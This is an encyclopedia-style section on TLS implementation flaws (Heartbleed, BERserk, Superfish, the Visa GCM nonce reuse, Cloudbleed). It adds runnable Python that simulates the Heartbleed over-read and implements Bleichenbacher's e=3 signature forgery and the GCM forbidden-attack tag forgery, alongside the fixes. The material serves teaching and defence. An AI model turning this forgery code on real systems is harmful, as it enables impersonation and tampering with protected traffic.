Transport Layer Security
====Implementation errors: {{Anchor|Heartbleed}}Heartbleed bug, {{Anchor|BERserk}}BERserk attack, Cloudflare bug====
{{Main|Heartbleed|Cloudbleed}}

The [[Heartbleed]] bug is a serious vulnerability specific to the implementation of SSL/TLS in the popular [[OpenSSL]] cryptographic software library, affecting versions 1.0.1 to 1.0.1f. This weakness, reported in April 2014, allows attackers to steal [[Public-key cryptography|private keys]] from servers that should normally be protected.<ref>{{cite news|url=https://www.washingtonpost.com/blogs/style-blog/wp/2014/04/09/why-is-it-called-the-heartbleed-bug|title=Why is it called the 'Heartbleed Bug'?|newspaper=The Washington Post|date=2014-04-09|url-status=live|archive-url=https://web.archive.org/web/20141009063758/http://www.washingtonpost.com/blogs/style-blog/wp/2014/04/09/why-is-it-called-the-heartbleed-bug|archive-date=2014-10-09}}</ref> The bug lies in OpenSSL's handling of the TLS heartbeat extension (RFC 6520): the server copies as many bytes into its reply as the client's heartbeat request claims its payload contains, without checking that claim against the length of the record actually received, so a malicious request with a small payload and a large claimed length returns up to 64 KB of whatever follows the request in the server process's memory. Since such requests can be repeated indefinitely, anyone on the Internet can read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret private keys associated with the [[X.509|public certificates]] used to identify the service providers and to encrypt the traffic, the names and passwords of the users, and the actual content, allowing attackers to eavesdrop on communications, steal data directly from the services and users, and impersonate services and users.<ref>{{cite web|url=https://blogs.comodo.com/e-commerce/heartbleed-bug-comodo-urges-openssl-users-to-apply-patch|title=Heartbleed Bug vulnerability [9 April 2014]|publisher=[[Comodo Group]]|url-status=live|archive-url=https://web.archive.org/web/20140705212748/https://blogs.comodo.com/e-commerce/heartbleed-bug-comodo-urges-openssl-users-to-apply-patch|archive-date=5 July 2014}}</ref> The vulnerability is caused by a [[buffer over-read]] bug in the OpenSSL software, rather than a defect in the SSL or TLS protocol specification.
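The following is an added example, not OpenSSL's code, that reproduces the heartbeat over-read in Python: a fake heap holds the received record followed by unrelated session data and a constructed placeholder secret, the flawed handler trusts the attacker's payload length, and the patched handler applies the two bounds checks that OpenSSL 1.0.1g introduced. The function names, the heap layout and the secret are all constructed for the illustration.

```python
"""Added example, not OpenSSL's code: the heartbeat over-read behind Heartbleed,
simulated against a bytearray standing in for the server's process memory.
Heartbeat message (RFC 6520): type (1) | payload_length (2, big-endian) |
payload | padding (>= 16).  OpenSSL 1.0.1-1.0.1f copied payload_length bytes
into the reply without checking it against the received record length."""
import struct

HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE, PADDING_LEN = 1, 2, 16
HEAP_SIZE = 4096
# Constructed stand-in for a secret lying on the heap just past the record.
SECRET = b"-----BEGIN RSA PRIVATE KEY-----\n(constructed placeholder)\n"


def build_heartbeat(claimed_len, payload=b""):
    """Heartbeat request whose length field may be larger than the real payload."""
    return bytes([HEARTBEAT_REQUEST]) + struct.pack(">H", claimed_len) + payload + bytes(PADDING_LEN)


def memory_with_record(record, secret=SECRET):
    """Fake heap: the record, some unrelated session data, the secret, free space."""
    heap = bytearray(record) + b"session-cache: user=alice; " + secret
    return heap + bytes(HEAP_SIZE - len(heap))


def _reply(payload_len, payload):
    return bytes([HEARTBEAT_RESPONSE]) + struct.pack(">H", payload_len) + payload + bytes(PADDING_LEN)


def vulnerable_process_heartbeat(memory, record_len):
    """Flawed logic: the attacker-supplied payload_length is trusted; record_len is unused."""
    hbtype = memory[0]
    (payload_len,) = struct.unpack(">H", memory[1:3])
    if hbtype != HEARTBEAT_REQUEST:
        return None
    return _reply(payload_len, bytes(memory[3:3 + payload_len]))  # BUG: over-read past the record


def fixed_process_heartbeat(memory, record_len):
    """Patched logic (OpenSSL 1.0.1g): bounds-check before touching the payload."""
    if 1 + 2 + PADDING_LEN > record_len:                # runt record: discard silently
        return None
    hbtype = memory[0]
    (payload_len,) = struct.unpack(">H", memory[1:3])
    if 1 + 2 + payload_len + PADDING_LEN > record_len:  # claimed length exceeds the record
        return None
    if hbtype != HEARTBEAT_REQUEST:
        return None
    return _reply(payload_len, bytes(memory[3:3 + payload_len]))


def leaked_bytes(response, honest_payload):
    """Bytes in the reply payload that the requester never sent."""
    (payload_len,) = struct.unpack(">H", response[1:3])
    return response[3:3 + payload_len][len(honest_payload):]


def demo(claimed_len=200):
    """Send a 2-byte payload claiming claimed_len bytes; return (leak, patched server's reply)."""
    honest = b"hi"
    record = build_heartbeat(claimed_len, honest)
    memory = memory_with_record(record)
    leak = leaked_bytes(vulnerable_process_heartbeat(memory, len(record)), honest)
    return leak, fixed_process_heartbeat(memory, len(record))


if __name__ == "__main__":
    leak, patched = demo()
    print("vulnerable server leaked:", leak)
    print("patched server replied:", patched)
```

With the default claimed length of 200 the vulnerable handler returns the padding, the session data and the placeholder key that sit beyond the 21-byte record, while the patched handler discards the request; with an honest length both handlers echo the payload identically, which is why the flaw survived two years of normal use.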
In September 2014, a variant of [[Daniel Bleichenbacher]]'s PKCS#1 v1.5 RSA signature forgery vulnerability<ref>{{cite web|url=http://www.imc.org/ietf-openpgp/mail-archive/msg06063.html|title=Bleichenbacher's RSA signature forgery based on implementation error|date=August 2006|first=Daniel|last=Bleichenbacher|author-link=Daniel Bleichenbacher|url-status=dead|archive-url=https://web.archive.org/web/20141216203704/http://www.imc.org/ietf-openpgp/mail-archive/msg06063.html|archive-date=2014-12-16}}</ref> was announced by Intel Security Advanced Threat Research. Bleichenbacher's original 2006 attack targets verifiers that check the padding and the hash at the start of the decrypted signature block but never check that they fill the whole block: with a small public exponent such as 3, an attacker can take an integer cube root of a suitably padded block and obtain a "signature" that verifies without the private key. The variant, dubbed BERserk, is a result of incomplete ASN.1 length decoding of public key signatures in some SSL implementations: malformed length fields in the encoded hash structure are accepted rather than rejected, so attacker-chosen bytes inside the block are skipped over unchecked, which again allows a man-in-the-middle attack by forging a public key signature.<ref>{{cite web|url=http://www.intelsecurity.com/advanced-threat-research|title=BERserk|date=September 2014|publisher=Intel Security: Advanced Threat Research|url-status=live|archive-url=https://web.archive.org/web/20150112153121/http://www.intelsecurity.com/advanced-threat-research|archive-date=2015-01-12}}</ref>

In February 2015, after media reported the hidden pre-installation of [[superfish]] adware on some Lenovo notebooks,<ref>{{cite web|url=https://arstechnica.com/information-technology/2015/02/lenovo-pcs-ship-with-man-in-the-middle-adware-that-breaks-https-connections|title=Lenovo PCs ship with man-in-the-middle adware that breaks HTTPS connections|last=Goodin|first=Dan|date=February 19, 2015|website=[[Ars Technica]]|access-date=December 10, 2017|url-status=live|archive-url=https://web.archive.org/web/20170912103610/https://arstechnica.com/information-technology/2015/02/lenovo-pcs-ship-with-man-in-the-middle-adware-that-breaks-https-connections|archive-date=September 12, 2017}}</ref> a researcher found a trusted root certificate on affected Lenovo machines to be insecure: its private key shipped with the software and could easily be extracted using the company name, Komodia, as the passphrase.<ref>{{cite web|first=Filippo|last=Valsorda|url=https://blog.filippo.io/komodia-superfish-ssl-validation-is-broken|title=Komodia/Superfish SSL validation is broken|publisher=Filippo.io|date=2015-02-20|url-status=live|archive-url=https://web.archive.org/web/20150224112141/https://blog.filippo.io/komodia-superfish-ssl-validation-is-broken|archive-date=2015-02-24}}</ref> The Komodia library was designed to intercept client-side TLS/SSL traffic for parental control and surveillance, but it was also used in numerous adware programs, including Superfish, that were often surreptitiously installed unbeknownst to the computer user. In turn, these [[potentially unwanted program]]s installed the same root certificate, with the same private key, on every affected machine, so anyone holding that key could issue a certificate for any website that those machines would accept as authentic, allowing attackers to completely control their web traffic.

In May 2016, it was reported that dozens of Danish HTTPS-protected websites belonging to [[Visa Inc.]] were vulnerable to attacks allowing hackers to inject malicious code and forged content into the browsers of visitors.<ref name="forbidden">{{cite web|last1=Goodin|first1=Dan|title="Forbidden attack" makes dozens of HTTPS Visa sites vulnerable to tampering|url=https://arstechnica.com/security/2016/05/faulty-https-settings-leave-dozens-of-visa-sites-vulnerable-to-forgery-attacks|website=Ars Technica|date=26 May 2016|access-date=26 May 2016|url-status=live|archive-url=https://web.archive.org/web/20160526175713/http://arstechnica.com/security/2016/05/faulty-https-settings-leave-dozens-of-visa-sites-vulnerable-to-forgery-attacks|archive-date=26 May 2016}}</ref> The attacks worked because the TLS implementation used on the affected servers reused the [[cryptographic nonce|nonce]] of the AES-GCM cipher, a value that must be used only once per key. When two records are encrypted under the same key and nonce, the XOR of their ciphertexts equals the XOR of their plaintexts, and the GCM authentication subkey can be computed from their authentication tags, after which the attacker can forge records that the visitor's browser accepts as genuine; the technique is known as the "forbidden attack" after [[Antoine Joux]]'s 2006 description of it.<ref name=forbidden/>

In February 2017, an implementation error caused by a single mistyped character in code used to parse HTML created a buffer overrun on [[Cloudflare]] servers. Similar in its effects to the Heartbleed bug discovered in 2014, this overrun, widely known as [[Cloudbleed]], allowed unauthorized third parties to read data in the memory of programs running on the servers, data that should otherwise have been protected by TLS.<ref>{{cite web|last1=Clark Estes|first1=Adam|title=Everything You Need to Know About Cloudbleed, the Latest Internet Security Disaster|url=https://gizmodo.com/everything-you-need-to-know-about-cloudbleed-the-lates-1792710616|website=[[Gizmodo]]|date=February 24, 2017|access-date=2017-02-24|url-status=live|archive-url=https://web.archive.org/web/20170225013516/http://gizmodo.com/everything-you-need-to-know-about-cloudbleed-the-lates-1792710616|archive-date=2017-02-25}}</ref> Unlike Heartbleed, the flaw was not in a TLS implementation: Cloudflare terminates TLS on behalf of its customers, so their traffic was in plaintext in the memory of its edge servers, and the parser bug leaked that plaintext into pages served to other visitors.
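The following added example (not the code of any TLS library, and not BERserk's particular ASN.1 trick) implements Bleichenbacher's original forgery described in the BERserk paragraph above, of which BERserk is a variant: a lax PKCS#1 v1.5 verifier that checks the padding and DigestInfo at the front of the block but not the bytes after them is fooled by the integer cube root of a crafted block, with no private key involved, against any RSA-2048 key with e = 3. The seeded Miller-Rabin key generation is a stand-in so the example runs offline, and the message and function names are constructed for the illustration.

```python
"""Added example, not any TLS library's code: Bleichenbacher's 2006 PKCS#1 v1.5
signature forgery, the attack BERserk is a variant of.  A lax verifier parses
00 01 FF..FF 00 DigestInfo from the front of the decoded block and ignores the
rest; with e = 3 a forger chooses a block with a short padding run and a long
unchecked tail, and takes its integer cube root.  RSA-2048, SHA-256.  The
Miller-Rabin key generation is a seeded, minimal stand-in (assumption) so the
example runs offline; it is not production key generation."""
import hashlib
import random

E, K = 3, 256  # public exponent and modulus length in bytes (RSA-2048)
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")  # RFC 8017 9.2, note 1
_rng = random.Random(20140924)  # fixed seed: deterministic demo keys


def _is_probable_prime(n, rounds=16):
    if any(n % p == 0 for p in (3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)):
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(_rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_key(bits=8 * K):
    """RSA key with e = 3: primes are chosen with p % 3 == 2 so that gcd(3, p - 1) = 1."""
    primes = []
    while len(primes) < 2:
        p = _rng.getrandbits(bits // 2) | (1 << (bits // 2 - 1)) | 1
        if p % 3 == 2 and _is_probable_prime(p):
            primes.append(p)
    p, q = primes
    return p * q, pow(E, -1, (p - 1) * (q - 1))


def _digest_info(message):
    return SHA256_DIGESTINFO + hashlib.sha256(message).digest()


def encode_em(message):
    """EMSA-PKCS1-v1_5: 00 01 FF..FF 00 DigestInfo, exactly K bytes."""
    t = _digest_info(message)
    return b"\x00\x01" + b"\xff" * (K - len(t) - 3) + b"\x00" + t


def sign(n, d, message):
    return pow(int.from_bytes(encode_em(message), "big"), d, n).to_bytes(K, "big")


def _decode(n, sig):
    return pow(int.from_bytes(sig, "big"), E, n).to_bytes(K, "big")


def verify_strict(n, message, sig):
    """Correct verifier: rebuild the whole expected block and compare all K bytes."""
    return _decode(n, sig) == encode_em(message)


def verify_lax(n, message, sig):
    """Flawed verifier: checks the front of the block, never the tail."""
    em = _decode(n, sig)
    if em[:2] != b"\x00\x01":
        return False
    i = 2
    while i < K and em[i] == 0xFF:
        i += 1
    if i - 2 < 8 or i >= K or em[i] != 0x00:
        return False
    t = _digest_info(message)
    return em[i + 1:i + 1 + len(t)] == t  # BUG: em[i + 1 + len(t):] is never examined


def _icbrt(x):
    """Floor of the integer cube root, by binary search."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        lo, hi = (mid, hi) if mid ** 3 <= x else (lo, mid - 1)
    return lo


def forge(message):
    """Signature the lax verifier accepts, computed from the message alone.
    The tail is K - 62 = 194 bytes (1552 bits) of don't-care; the cube of the
    floor cube root of the all-FF-tail block falls short of it by less than
    3*s^2 < 2^1368, so the cube still begins with the prefix the verifier checks."""
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + _digest_info(message)
    tail = K - len(prefix)
    s = _icbrt(int.from_bytes(prefix + b"\xff" * tail, "big"))
    assert s ** 3 >= int.from_bytes(prefix + bytes(tail), "big")
    return s.to_bytes(K, "big")


def demo():
    """(good sig passes strict, good passes lax, forgery passes strict, forgery passes lax)."""
    n, d = gen_key()
    msg = b"CN=example.com"  # constructed stand-in for the signed data
    good, forged = sign(n, d, msg), forge(msg)
    return (verify_strict(n, msg, good), verify_lax(n, msg, good),
            verify_strict(n, msg, forged), verify_lax(n, msg, forged))
```

The defence is the one in `verify_strict`: re-encode the expected block in full and compare every byte, rather than parsing the decrypted block and trusting whatever structure the parser happens to consume. BERserk differs only in how the tail is hidden, inside an ASN.1 length field that the decoder fails to validate, so the same fix applies.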
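The following added example (not Visa's or any TLS library's code) carries the forbidden attack from the Visa paragraph above through for two single-block records encrypted under the same key and nonce: it recovers the GHASH subkey H from the two tags, then forges a tag for a modified ciphertext that the victim accepts. Because the attack uses only the GHASH polynomial, AES is modelled by HMAC-SHA256 truncated to 16 bytes, which is an assumption of the example; GF(2^128) multiplication, GHASH and counter mode follow NIST SP 800-38D. The key, nonce and records are constructed, and the attacker is assumed to know the first record's plaintext.

```python
"""Added example, not Visa's or any TLS library's code: the 'forbidden attack' on
AES-GCM when a nonce is reused under one key.  The block cipher only supplies
the keystream and a per-nonce tag mask, and the forgery works on the GHASH
polynomial alone, so AES is modelled here (assumption) by HMAC-SHA256 truncated
to 16 bytes; GF(2^128), GHASH and counter mode follow NIST SP 800-38D."""
import hashlib
import hmac

R = 0xE1 << 120  # reduction constant of x^128 + x^7 + x^2 + x + 1 in GCM's bit order
ONE = 1 << 127   # the field element 1 in GCM's bit-reflected representation


def gf_mul(x, y):
    """Multiplication in GF(2^128), SP 800-38D algorithm 1."""
    z, v = 0, x
    for i in range(127, -1, -1):
        if (y >> i) & 1:
            z ^= v
        v = (v >> 1) ^ R if v & 1 else v >> 1
    return z


def gf_pow(x, e):
    r = ONE
    while e:
        if e & 1:
            r = gf_mul(r, x)
        x, e = gf_mul(x, x), e >> 1
    return r


def gf_inv(x):
    return gf_pow(x, (1 << 128) - 2)  # x^(2^128 - 1) = 1 for x != 0


def gf_sqrt(x):
    return gf_pow(x, 1 << 127)        # squaring is a bijection, so sqrt(x) = x^(2^127)


def ghash(h, aad, ct):
    """GHASH_H(A, C): blocks zero-padded to 16 bytes, then the 64|64-bit length block."""
    y = 0
    for data in (aad, ct):
        for i in range(0, len(data), 16):
            y = gf_mul(y ^ int.from_bytes(data[i:i + 16].ljust(16, b"\x00"), "big"), h)
    lengths = (8 * len(aad)).to_bytes(8, "big") + (8 * len(ct)).to_bytes(8, "big")
    return gf_mul(y ^ int.from_bytes(lengths, "big"), h)


def block_cipher(key, block):
    """Stand-in for AES_K (assumption); any 16-byte keyed PRF yields the same attack."""
    return hmac.new(key, block, hashlib.sha256).digest()[:16]


def _ctr(key, nonce, data):
    """Counter mode with a 96-bit nonce: block i is masked with E_K(nonce || i + 2), as in GCM."""
    out = bytearray()
    for i in range(0, len(data), 16):
        ks = block_cipher(key, nonce + (i // 16 + 2).to_bytes(4, "big"))
        out += bytes(a ^ b for a, b in zip(data[i:i + 16], ks))
    return bytes(out)


def _tag(key, nonce, aad, ct):
    h = int.from_bytes(block_cipher(key, bytes(16)), "big")                   # H = E_K(0^128)
    s = int.from_bytes(block_cipher(key, nonce + b"\x00\x00\x00\x01"), "big")  # E_K(J0)
    return (s ^ ghash(h, aad, ct)).to_bytes(16, "big")


def gcm_encrypt(key, nonce, pt, aad=b""):
    ct = _ctr(key, nonce, pt)
    return ct, _tag(key, nonce, aad, ct)


def gcm_decrypt(key, nonce, ct, tag, aad=b""):
    """Plaintext, or None when the tag does not verify."""
    return _ctr(key, nonce, ct) if hmac.compare_digest(_tag(key, nonce, aad, ct), tag) else None


def recover_h(c1, t1, c2, t2):
    """Two single-block records, same key and nonce, no AAD:
    T1 ^ T2 = (C1 ^ C2) * H^2, hence H = sqrt((T1 ^ T2) / (C1 ^ C2))."""
    dc = int.from_bytes(c1, "big") ^ int.from_bytes(c2, "big")
    dt = int.from_bytes(t1, "big") ^ int.from_bytes(t2, "big")
    return gf_sqrt(gf_mul(dt, gf_inv(dc)))


def forge_tag(c1, t1, new_ct, h):
    """Tag for a modified single-block ciphertext: T' = T1 ^ (C1 ^ C') * H^2."""
    diff = int.from_bytes(c1, "big") ^ int.from_bytes(new_ct, "big")
    return (int.from_bytes(t1, "big") ^ gf_mul(gf_mul(diff, h), h)).to_bytes(16, "big")


def demo():
    """(what the victim decrypts from the forged record, whether H was recovered correctly)."""
    key, nonce = b"constructed-key!", b"\x00\x00\x00\x00reused!!"  # constructed 16- and 12-byte values
    p1, p2 = b"amount=00100.00;", b"amount=00250.00;"               # two constructed 16-byte records
    c1, t1 = gcm_encrypt(key, nonce, p1)
    c2, t2 = gcm_encrypt(key, nonce, p2)  # same nonce: the server's mistake
    h = recover_h(c1, t1, c2, t2)
    target = b"amount=99999.99;"
    new_ct = bytes(a ^ b ^ c for a, b, c in zip(c1, p1, target))  # CTR: flip plaintext bits
    seen = gcm_decrypt(key, nonce, new_ct, forge_tag(c1, t1, new_ct, h))
    return seen, h == int.from_bytes(block_cipher(key, bytes(16)), "big")
```

With longer or unequal-length records the same identity gives a polynomial in H whose roots must be found over GF(2^128), which is still cheap; the one-block case is enough to show why a repeated nonce turns GCM from an authenticated cipher into one whose tags anyone on the path can compute. The keystream reuse that lets the attacker set a chosen plaintext is the same weakness: `c1 ^ c2` equals `p1 ^ p2`.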